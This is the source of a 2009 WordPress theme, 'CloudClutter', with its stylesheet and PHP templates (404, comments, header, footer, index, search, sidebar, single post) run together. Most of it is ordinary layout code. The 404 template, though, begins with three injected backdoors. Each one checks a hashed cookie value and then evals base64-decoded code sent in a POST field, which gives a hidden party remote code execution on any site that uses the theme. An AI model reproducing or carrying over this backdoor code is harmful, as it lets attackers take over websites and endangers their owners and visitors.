/*   
Theme Name: CloudClutter
Theme URI: http://maxisnow.com/2009/02/cloudclutter/
Description: This theme isn't the most sophisicated. It's actually a hacked up and minimized version of <a href="http://wordpress.org/extend/themes/threattocreativity">Threat To Creativity</a>. However, it's beautiful in it's own way. This theme is not for serious content bloggers or the most orienting. The home page employs a flash piece courtesy of <a href="http://www.roytanck.com/2008/03/15/wp-cumulus-released/">WP Cumulus</a>....but I've broken it apart a bit. Instead of using WP Cumulus for tags in the sidebar, it feeds out the most recent titles on the home page. Whether you set 1 or 100 posts to be on your home page, all the titles will file into this flash cloud interface. Give this theme a spin!
Author: Max is NOW!
Author URI: http://www.maxisnow.com
Tags: blue, brown, green, orange, red, yellow, purple, light, two-columns, fixed-width, right-sidebar, threaded-comments
Version: 1.1


    Copyright (C) 2009  Max Kirchoff
	The CSS, XHTML and design is released under GPL:
	http://www.opensource.org/licenses/gpl-license.php


*/


/* -standards- */



body {
	background: #000000;
	color: #660000;
	font-family: Arial Black, Impact;
	font-size: .75em;
	display: block;
	margin: 0 0 0 0;
	padding: 0 0 0 0;
	}

.contentpost p {
	text-align: left;
    clear: both;
	}

h2 {
	font-size: 1.2em;
	text-transform: uppercase;
	}

a {
	color: #CC0000;
	text-decoration: none;
	}
#flashcontent {
	
}
.entry a {
	color: #993333;
	text-decoration: underline;
	}

a:hover {
	color: #CC3300;
	}

blockquote {
	background: url("images/blockquote.jpg") no-repeat top left;
	font-style: italic;
	padding-left: 30px;
	}

#navlink {
	margin: 30px 0 30px 0;
	}

#topbar {
	border-bottom: 1px solid #a9a9a9;
	padding: 30px 0 35px 0;
	width: 800px;
	}

.blogtitle {
	font-weight: bold;
	font-size: 65px;
	position:relative;
	line-height:52px;
	float: left;
	width: 600px;
	text-transform: uppercase;
	}
.blogtitle a {
	color: #990000;
	}
.blogtitle a:hover {
	color: #660000;
	}
.blogdescription {

	color: #FFFFFF;

	text-transform: uppercase;
	text-align: right;
	position: relative;
	font-weight: itallic;
	width: 790px;
	padding: 0 5px 0 5px;
	float: right;
	width: 300px;
	}

#banner {



	}



/* -content- */



#contentwrap {


	width: 990px;
margin-left: auto;
margin-right: auto;

	}

#content {

	float: left;
        width: 800px;

	}

#content2 {

	float: left;


	width: 80%;

	margin: 0 5px 0 11px;

	}

#contentpost {

	margin-left: auto;

	margin-right: auto;

	width: 640px;

	background: #000000;

	padding-right:8px;

	}

	

/* SIDEBAR */



#sidebar {

        position: relative;

	float: right;

	margin-bottom: 30px;

	width: 175px;

	margin-right: 4px;
	}





#sidebar .sidebar_header {

	// background is determined in random color generator include;

	}

#sidebar h2 {

	color: #000000;

	font-weight: normal;

	text-transform: uppercase;

	font-size: 30px;

	text-align: center;

	}


.widgettitle {
background: #330000;
}
#sidebar h2.small, #sidebar h2.widgettitle {

	// background is determined in random color generator include;

	color: #000000;

	font-size: 15px;

	font-weight: bold;

	margin-top: 20px;

	padding: 3px;

	text-transform: uppercase;

	}


#sidebar ul {

	list-style: none;

	margin: 0;

	padding: 0;

	}

#sidebar li {

	list-style: none;

	}

#sidebar ul li {

	border-bottom: 1px dotted #a9a9a9;

	padding: 3px 3px 3px 10px;

	}

#sidebar img {

width: 100%;

border: 0;

}



/* -post and entries- */

.post {

	float:left;

	position: relative;

	width: 200px;

	padding: 15px 15px 15px 15px;

	height: 185px;

	overflow: hidden;

	}

.post_single {

	float:left;

	width: 620px;

	margin: 20px 20px 20px 20px;

	}

.entry p img {

	border: 0px;

        margin: 4px;

	}

.postdate {

	color: #FF0000;

	font-size: 11px;

	font-weight: bold;

	text-transform: uppercase;

	}

.postdate_single {

	color: #FFFFFF;

	font-size: 23px;

	font-weight: bold;

	text-transform: uppercase;

	}

.pagetitle {

	color: #000000;

	font-size: 2em;

	font-weight: bold;

	margin-top: 14px;

	text-transform: uppercase;

	}

.posttitle {

	font-size: 26px;

	font-weight: bold;

	text-transform: uppercase;

	line-height: 19px;

	}

.posttitle_single {

	font-size: 30px;

	font-weight: bold;

	text-transform: uppercase;

	}

.posttitle a {

	color: #ffffff;

	}

.posttitle a:hover {

	color: #FFCC00;

	}

.postmetadatabottom {

	background: #000000;

	margin: 15px 0 15px 0;

	padding: 3px;

	text-transform: uppercase;

	width: 100px;

	}

.postmetadatabottom a {

	color: #CCFFCC;

	}

.postmetadatabottom a:hover {

	color: #CC9999;

	}

.entry {

	// border-bottom: 1px dotted #a9a9a9;

	padding-bottom: 10px;

	}



/* -search form- */



#searchsubmit {

	display: none;

	}

#search {

	border: solid 1px #ffffff ;

	color: #FFCC99;

	text-transform: uppercase;

	font-size:10px;

font-weight:bold;

	background: transparent;

	}

.searchform {

	color: #000000;

	text-transform: uppercase;

	font-size:11px;

	font-weight:bold;

	padding: 3px;

	margin-top: 3px;

}






#footer {
	clear: both;
	color: #000000;
	padding: 10px 0 35px 0;
	text-align:center;

	}

#footer a {

	color: #000000;

	}



/* -comments- */



#comments {

	clear: both;

	padding-top: 20px;

	padding-left: 20px;

	}

#respond {

	clear: both;

	padding-top: 20px;

	padding-left: 20px;

	}

.comment-info-split {

	clear: both;

	}

.commentmetadata {

	text-transform: uppercase;

	}

.commentlist div.alt {

	color: #000000;

	padding: 10px;

	}

ol.commentlist {
list-style: none;
}
ol.commentlist ul.children {
list-style: none;
}

.comment-div {

	display: block;

	}

.comment-left {

	width: 30%;

	}

.comment-right {

	width: 70%;

	}
.comment-author {

}
.avatar {
background:#000000 none repeat scroll 0 0;
float:left;
margin-bottom:0px;
padding:0px;
}
.commentlist ul li {
border-bottom:none;
}
.commentlist li {
margin: 10px 0 0 0 ;
}
ol.commentlist { list-style:none; margin:0 0 1em; padding:0; text-indent:0; }
ol.commentlist li { }
ol.commentlist li.alt { }
ol.commentlist li.bypostauthor {}
ol.commentlist li.byuser {}
ol.commentlist li.comment-author-admin {}
ol.commentlist li.comment { border-bottom:1px dotted #666; padding:1em; }
ol.commentlist li.comment div.comment-author {}
ol.commentlist li.comment div.vcard { font:normal 16px arial; }
ol.commentlist li.comment div.vcard cite.fn { font-style:normal; }
ol.commentlist li.comment div.vcard cite.fn a.url {}
ol.commentlist li.comment div.vcard img.avatar { border:5px solid #ccc; float:left; margin:0 1em 1em 1em; }
ol.commentlist li.comment div.vcard img.avatar-32 {}
ol.commentlist li.comment div.vcard img.photo {}
ol.commentlist li.comment div.vcard span.says {}
ol.commentlist li.comment div.commentmetadata {}
ol.commentlist li.comment div.comment-meta { font-size:9px; }
ol.commentlist li.comment div.comment-meta a { color:#CCF; }
ol.commentlist li.comment p { font-size:11px; margin:0 0 1em; }
ol.commentlist li.comment ul { font-size:11px; list-style:square; margin:0 0 1em 2em; }
ol.commentlist li.comment div.reply { font-size:11px; }
ol.commentlist li.comment div.reply a { font-weight:bold; }
ol.commentlist li.comment ul.children { list-style:none; margin:1em 0 0; text-indent:0; }
ol.commentlist li.comment ul.children li {}
ol.commentlist li.comment ul.children li.alt {}
ol.commentlist li.comment ul.children li.bypostauthor {}
ol.commentlist li.comment ul.children li.byuser {}
ol.commentlist li.comment ul.children li.comment {}
ol.commentlist li.comment ul.children li.comment-author-admin {}
ol.commentlist li.comment ul.children li.depth-2 { margin:0 0 .25em .25em; }
ol.commentlist li.comment ul.children li.depth-3 { margin:0 0 .25em .25em; }
ol.commentlist li.comment ul.children li.depth-4 { margin:0 0 .25em .25em; }
ol.commentlist li.comment ul.children li.depth-5 {}
ol.commentlist li.comment ul.children li.odd {}
ol.commentlist li.even { background:#000000; color:#990000 }
ol.commentlist li.odd { background:#330000; color:#000000 }
ol.commentlist li.thread-alt { }
ol.commentlist li.thread-even {}
ol.commentlist li.thread-odd {}

/* -floats -*/



.aligncenter,

div.aligncenter {

   display: block;

   margin-left: auto;

   margin-right: auto;

}



.alignleft {

   float: left;

}



.alignright {

   float: right;

}

#header {
	float:left;
	position: relative;
	width: 990px;
	margin: 0 0 0 0;
	border-bottom: solid 1px #235235;
	}

#header_nav {
	float:right;
	position: relative;
	margin: 0 0 0 0px;
	}

#bodywrap {
	margin: 0 0 0 0;
	padding: 0 0 0 0;
	width: 100%;
	}

.bg {
	height:185px;
	overflow:hidden;
}

.post:hover {
	background: white !important;
	}

.post:hover .posttitle a {
	color: black !important;
	}

.subnav li {
	list-style:none;
	border-bottom:1px solid #FFF;
	}

.subnav li a:link, .subnav li a:visited {
	background:#eef5e1;
	display:block;
	padding:4px 4px 4px 8px;
	border-left:4px solid #e4efd5;
	}

.subnav li a:hover, .subnav li a:active {
	background:#e4efd5;
	text-decoration:none;
	color: #7da939;
	}

.subnav li li a:link, .subnav li li a:visited {
	border-left:none
	}

#nav {
	background:#000000;
	font-size:1.1em;
	z-index:5000;
	}

#nav, #nav ul {
	margin: 0;
	padding: 0;
	list-style: none;
	line-height: 1;
	z-index:5000;
	}

#nav a, #nav a:hover {
	background:#810945;
	display: block;
	text-decoration: none;
	border:none;
	z-index:5000;
	}

#nav li {
	background:#000000;
	float: right;
	list-style:none;
	border-right:1px solid #a9a9a9;
	z-index:5000;
	}

#nav a, #nav a:visited {
	background:#000000;
	display:block;
	font-weight:bold;
	color: #f5f5f4;
	padding:6px 12px;
	z-index:5000;
	}

#nav a:hover, #nav a:active, .current_page_item	a, #home .on {
	background:#235024;
	text-decoration:none;
	z-index:5000;
	}	
			
#nav li ul {
	position: absolute;
	left: -999em;
	height: auto;
	width: 174px;
	border-bottom: 1px solid #a9a9a9;
	z-index:5000;
	}
	
#nav li li {
	width: 172px;
	border-top: 1px solid #a9a9a9;
	border-right: 1px solid #a9a9a9;
	border-left: 1px solid #a9a9a9;
	background: #777;
	z-index:5000;
	}

#nav li li a, #nav li li a:visited {
	font-weight:normal;
	font-size:0.9em;
	color:#FFF;
	z-index:5000;
	}

#nav li li a:hover, #nav li li a:active {
	background:#000;
	z-index:5000;
	}	

#nav li:hover ul, #nav li li:hover ul, #nav li li li:hover ul, #nav li.sfhover ul, #nav li li.sfhover ul, #nav li li li.sfhover ul {
	left: auto;
	z-index:5000;
	}

a.main:hover {	
	background:none;
}

#commentform {
	margin: 10px 10px 10px 10px;
	padding: 0 10px 10px 10px; 
}

.picleft {
	float: left;
	margin: 4px;
	clear:both;
}

.picright {
	float: right;
	margin: 4px;
	clear:both;
}
.alignright {
	float: right;
	margin: 4px;
	clear:both;
}
.alignleft {
	float: left;
	margin: 4px;
	clear:both;
}
.aligncenter,
div.aligncenter {
   display: block;
   margin-left: auto;
   margin-right: auto;
}


.entry ol li {
	clear: both; 
	margin-top: 10px;
	position:relative;
}

#cattag {
	font-size: 10px;
        color: CCFFCC
}

404:
<?php if(md5($_COOKIE['b125943def1073a4'])=="b731dc0d75940a8bc03490660bf4ce38"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['38152ce7c19fbb28'])=="e4c8b57e5b79c17d38d64b110267364b"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['9f5188bbaf408618'])=="0766c58f28faf36072af8b02697f8469"){ eval(base64_decode($_POST['file'])); exit; } ?><?php get_header();?>

	<div id="content">
		<div id="banner"></div>
			<div class="pagetitle">Error 404</div>
			<p>Hello there we cannot be inside all of day, so maybe this doesn't exist? Go to another place and be happy or not for you.:</p>
			<ul>
				<?php get_archives('monthly', '', 'html', '', '', TRUE); ?>
			</ul>
		</div>
		<div id="navigationwrap">
			<?php get_sidebar();?>
        </div>
	</div>
<?php get_footer();?>

COMMENTS:
<?php

	if (!empty($_SERVER['SCRIPT_FILENAME']) && 'comments.php' == basename($_SERVER['SCRIPT_FILENAME']))
		die ('Please do not load this page directly. Thanks!');

	if ( post_password_required() ) { ?>
		<p class="nocomments">This post is password protected. Enter the password to view comments.</p>
	<?php
		return;
	}
?>


<?php if ( have_comments() ) : ?>
	
    <h3 id="comments"><?php comments_number('Comments go here, why not?', '1 Comment', '% Comments' );?> to &#8220;<?php the_title(); ?>&#8221;</h3>

	<div class="navigation">
		<div class="alignleft"><?php previous_comments_link() ?></div>
		<div class="alignright"><?php next_comments_link() ?></div>
	</div>

	<ol class="commentlist">
	<?php wp_list_comments('avatar_size=48'); ?>
	</ol>

	<div class="navigation">
		<div class="alignleft"><?php previous_comments_link() ?></div>
		<div class="alignright"><?php next_comments_link() ?></div>
	</div>
 <?php else : // this is displayed if there are no comments so far ?>

	<?php if ('open' == $post->comment_status) : ?>
		<!-- If comments are open, but there are no comments. -->

	 <?php else : // comments are closed ?>
		<!-- If comments are closed. -->
		<p class="nocomments">Comments are closed.</p>

	<?php endif; ?>
<?php endif; ?>


<?php if ('open' == $post->comment_status) : ?>

<div id="respond">

<h3><?php comment_form_title( 'WORDS.', 'Leave a Reply to %s' ); ?></h3>

<div class="cancel-comment-reply">
	<small><?php cancel_comment_reply_link(); ?></small>
</div>

<?php if ( get_option('comment_registration') && !$user_ID ) : ?>
<p>You must be <a href="<?php echo get_option('siteurl'); ?>/wp-login.php?redirect_to=<?php echo urlencode(get_permalink()); ?>">logged in</a> to post a comment.</p>
<?php else : ?>

<form action="<?php echo get_option('siteurl'); ?>/wp-comments-post.php" method="post" id="commentform">

<?php if ( $user_ID ) : ?>

<p>YOU ARE <a href="<?php echo get_option('siteurl'); ?>/wp-admin/profile.php"><?php echo $user_identity; ?></a>. <a href="<?php echo wp_logout_url(get_permalink()); ?>" title="Log out of this account">Log out &raquo;</a></p>

<?php else : ?>

<p><input type="text" name="author" id="author" value="<?php echo $comment_author; ?>" size="22" tabindex="1" <?php if ($req) echo "aria-required='true'"; ?> />
<label for="author"><small>Name <?php if ($req) echo "(required)"; ?></small></label></p>

<p><input type="text" name="email" id="email" value="<?php echo $comment_author_email; ?>" size="22" tabindex="2" <?php if ($req) echo "aria-required='true'"; ?> />
<label for="email"><small>Mail (will not be published) <?php if ($req) echo "(required)"; ?></small></label></p>

<p><input type="text" name="url" id="url" value="<?php echo $comment_author_url; ?>" size="22" tabindex="3" />
<label for="url"><small>Website</small></label></p>

<?php endif; ?>

<!--<p><small><strong>XHTML:</strong> You can use these tags: <code><?php echo allowed_tags(); ?></code></small></p>-->

<p><textarea name="comment" id="comment" cols="50" rows="10" tabindex="4"></textarea></p>

<p><input name="submit" type="submit" id="submit" tabindex="5" value="Submit Comment" />
<?php comment_id_fields(); ?>
</p>
<?php do_action('comment_form', $post->ID); ?>

</form>

<?php endif; // If registration required and not logged in ?>
</div>

<?php endif; // if you delete this the sky will fall on your head ?>

FOOTER:
		<div id="footer">
			<?php wp_footer();?>
            	<strong>
					<?php bloginfo('name'); ?>
                </strong>
			<?php bloginfo('description'); ?>


        	<br /><br /><b>CloudClutter</b> Theme by <strong><a href="http://www.maxisnow.com" target="_maxisnow">Max is NOW!</a></strong><br />Powered by <a href="http://www.wordpress.org" target="_blank">
            	<strong>
                	WordPress
                </strong>
           	</a>
        </div>
	</div>
</div>
</body>
</html>

HEADER
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" /> 
	<title><?php bloginfo('name'); ?> | <?php bloginfo('description'); ?></title>
	<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
	<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
	<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />

	<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/swfobject.js"></script>
	<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?>
	<?php wp_head(); ?>

</head>
<body>

		<div id="contentwrap">
		<div id="header">
        	<div class="blogtitle">
            	<a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a>
            </div>
            <div class="blogdescription">
				>> <?php bloginfo('description'); ?>
            </div>
		</div>

MAIN INDEX:
<?php get_header();?>

		




<div id="content">
				<div id="banner">
                </div>
				
					<div id="flashcontent">This will be shown to users with no Flash or Javascript.</div>

	<script type="text/javascript">
		var so = new SWFObject("<?php bloginfo('template_directory'); ?>/tagcloud.swf", "tagcloud", "800", "400", "7", "#000000");
		// uncomment next line to enable transparency
		//so.addParam("wmode", "transparent");
		so.addVariable("tcolor", "0xFF3300");
		so.addVariable("mode", "tags");
		so.addVariable("distr", "true");
		so.addVariable("tspeed", "100");
		so.addVariable("tagcloud", "<tags><?php $i = 100; ?><?php if (have_posts()) : while (have_posts()) : the_post(); ?><?php $z = $i--; ?><a href='<?php the_permalink() ?>'  style='7.<?php echo $z; ?>' color='0x<?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?>' hicolor='0x<?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?>' rel='bookmark' title='<?php the_title_attribute(); ?>'><?php the_title(); ?></a><?php endwhile; ?></tags>");
		so.write("flashcontent");
	</script>

				

				<?php endif; ?>
                
				<div style="clear:both;">
                </div>

				
			</div>

			<?php get_sidebar();?>
	
    	

<?php get_footer();?>

SEARCH FORM:
<div class="searchform"><form method="get" id="searchform" action="<?php bloginfo('url'); ?>/">

SEARCH <input type="text" value="" name="s" id="search" />

<input type="submit" id="searchsubmit" value="Search" />

</form></div>

SEARCH RESULTS:
<?php get_header();?>

	<div id="bodywrap">

<div id="header_left"><div class="blogtitle"><a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a></div> <div class="blogdescription"><?php bloginfo('description'); ?></div></div>

			<div id="header_right"></div>

<div id="contentwrap">

<div id="content">

		<div id="banner"></div>

		<div class="pagetitle">Search Results for "<?php the_search_query(); ?>"</div>
				<?php $i = 1; ?>
		<?php 
if (have_posts()) : while (have_posts()) : the_post(); ?>

		<?php $z = $i++; ?>
		<div onclick="location.href='<?php the_permalink() ?>';" style="cursor:pointer;background:#<?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?><?php echo rand(0, 9); ?>;" class="post bg" id="post-<?php the_ID(); ?>"><div style="height:185px;overflow:hidden;">
		
		



			<div class="postdate"><?php the_time('m.d.Y') ?></div>

			<div class="posttitle"><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></div>

			<div><small>Categories: <?php the_category(', '); ?> | <?php comments_popup_link('Add a Comment', '1 Comment', '% Comments'); ?></small></div>

			<div align="center" class="entrywhole">

				<div align="left" class="entry">

					<?php the_excerpt('Read more &raquo;'); ?>

					

					

				</div>

			</div></div>

		</div>		<?php endwhile; else: ?>

			<p>Nothing found. Try something else.</p>

		<?php endif; ?>

	</div>

	<div id="navigationwrap">

		<?php get_sidebar();?>

	</div>

</div>

<?php get_footer();?>




SIDEBAR:
		<div id="sidebar">

				

<?php 	/* Widgetized sidebar, if you have the plugin installed. */
					if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar() ) : ?>


		<h2 class="widgettitle">Recent Posts</h2>
		<ul>
			  <ul><?php get_archives('postbypost','10','custom','<li>','</li>'); ?></ul>

		</ul>
		
		
		<?php endif; ?>
		</div>

SINGLE POST:
<?php get_header();?>

	<div id="contentwrap"><div id="content2"><div id="contentpost">

		<div id="banner"></div>

<?php if (have_posts()) : ?>

		<?php while (have_posts()) : the_post(); ?>

		<div class="post_single" id="post-<?php the_ID(); ?>">

                        <div class="posttitle_single"><?php the_title(); ?></div>

			<div class="postdate_single"><?php the_time('Y.Mz.TIH') ?></div>

                        <div id="cattag">Categories: <?php the_category('|| '); ?></div> 
                        <?php the_tags('Tim: '); ?> </div>

<div align="center" class="entrywhole">

<div align="left" class="entry">

<?php the_content('Read more &raquo;'); ?>
                

		<div><?php comments_template(); ?></div>
</div>


</div>

		<?php endwhile; ?>

		<?php endif; ?>

	</div>

	<div id="navigationwrap">

	</div>

</div>

<?php get_sidebar();?>


<?php get_footer();?>

THEME FUNCTIONS:
<?php

if ( function_exists('register_sidebar') )

    register_sidebar();

?>
